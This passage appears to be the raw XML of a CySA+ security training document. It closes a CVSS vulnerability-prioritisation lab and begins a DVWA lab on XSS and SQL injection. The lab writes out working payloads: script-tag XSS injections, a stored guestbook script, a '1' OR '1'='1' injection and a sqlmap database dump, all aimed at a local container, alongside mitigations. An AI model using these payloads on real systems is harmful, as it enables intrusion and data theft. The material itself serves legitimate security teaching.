              <w:t>7.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1358"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>4.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1358"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PoC only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1358"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Low (air-gapped)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1358"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Patch in maintenance window</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1358"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1358"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Reflected XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1358"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>6.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1358"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>5.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1358"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1358"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Medium (brand)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1358"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Patch next sprint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 8 — Handle zero-days and exploitability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Zero-day = no patch exists yet. CVSS Base still applies but the Temporal score caps you (Remediation Level = Unavailable). Mitigations to recommend until a patch ships:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Compensating control (Lab 24 isolation)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Virtual patching at WAF / IPS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Configuration workaround</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Confirm exploit maturity on:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CISA KEV — https://www.cisa.gov/known-exploited-vulnerabilities-catalog</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Exploit-DB — https://www.exploit-db.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>EPSS — https://www.first.org/epss (predicted exploit probability)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 9 — Validation (CySA+ 2.3 — true/false positive/negative)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A scanner finding may be:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>True positive — vuln exists and is exploitable (Lab 15 check)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>False positive — version banner matched but patch backported</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>True negative — correctly silent</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>False negative — scanner missed it (the worst kind)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Always re-test high-severity findings manually before committing to a patch SLA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>What You Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Score a Base CVSS vector for three realistic vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Apply environmental context to demote or promote a score.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Cross-reference exploit databases for weaponisation status.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Produce a defensible, business-aware remediation priority list.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:shd w:val="clear" w:fill="FDF3E7"/>
        <w:ind w:left="144" w:right="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="C87A1E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test it: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A scanner finding may be:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Lab 17 — Exploiting and Mitigating XSS and SQL Injection</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exploit a reflected XSS, a stored XSS, and a SQL injection on DVWA — then implement the standard mitigations (input validation, output encoding, parameterised queries, prepared statements).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In this lab you will exploit a reflected XSS, a stored XSS, and a SQL injection on DVWA — then implement the standard mitigations (input validation, output encoding, parameterised queries, prepared statements). This maps to CySA+ 2.4 (Cross-site scripting, Injection flaws) and the Secure coding best practices sub-list.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Run on the Killercoda Ubuntu Playground: https://killercoda.com/playgrounds/scenario/ubuntu</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Ubuntu Playground</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4937760" cy="2042982"/>
            <wp:docPr id="13" name="Picture 13"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="img_acb9c172ac.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4937760" cy="2042982"/>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4937760" cy="2740328"/>
            <wp:docPr id="14" name="Picture 14"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="img_89d1b25ce1.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4937760" cy="2740328"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 1 — Start DVWA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>apt update &amp;&amp; apt install -y docker.io sqlmap curl</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>systemctl start docker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>docker run -d --name dvwa -p 8080:80 vulnerables/web-dvwa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sleep 10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Browse to http://127.0.0.1:8080, login admin / password, set DVWA Security = low, Setup → Create / Reset Database.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Capture your session cookie from the browser (DevTools → Application → Cookies). Save it:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>COOKIE="PHPSESSID=&lt;paste yours&gt;; security=low"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 2 — Reflected XSS (CySA+ "XSS — Reflected")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The DVWA endpoint vulnerabilities/xss_r/?name= echoes input straight into HTML.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -s -b "$COOKIE" "http://127.0.0.1:8080/vulnerabilities/xss_r/?name=&lt;script&gt;alert(1)&lt;/script&gt;" | grep script</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You will see your &lt;script&gt; tag in the response — the browser would execute it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Mitigation (output encoding): the PHP fix replaces echo $name with echo htmlspecialchars($name, ENT_QUOTES, 'UTF-8'). View the DVWA impossible source to compare.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 3 — Stored XSS (CySA+ "XSS — Persistent")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>vulnerabilities/xss_s/ posts a guestbook message that is stored in MySQL and rendered to every visitor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -s -b "$COOKIE" -d "txtName=mal&amp;mtxMessage=&lt;script&gt;alert('stored')&lt;/script&gt;&amp;btnSign=Sign+Guestbook" \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  "http://127.0.0.1:8080/vulnerabilities/xss_s/"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -s -b "$COOKIE" "http://127.0.0.1:8080/vulnerabilities/xss_s/" | grep -i "stored"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Persistent XSS is graver: every viewer is compromised, not just the original target.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Mitigation: server-side input validation (allow-list of characters), output encoding on render, and a Content-Security-Policy header that disallows inline scripts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 4 — SQL Injection — manual</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>vulnerabilities/sqli/?id= builds a SQL query by concatenation. Classic auth-bypass payload:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -s -b "$COOKIE" "http://127.0.0.1:8080/vulnerabilities/sqli/?id=1%27%20OR%20%271%27=%271&amp;Submit=Submit" | grep -E 'First name|Surname'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>URL-decoded payload: 1' OR '1'='1. The query becomes SELECT … WHERE id='1' OR '1'='1' and returns every row.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 5 — SQL Injection — automated with sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sqlmap -u "http://127.0.0.1:8080/vulnerabilities/sqli/?id=1&amp;Submit=Submit" \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  --cookie="$COOKIE" --batch --dbs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>sqlmap will:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Detect the injection point and DB engine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
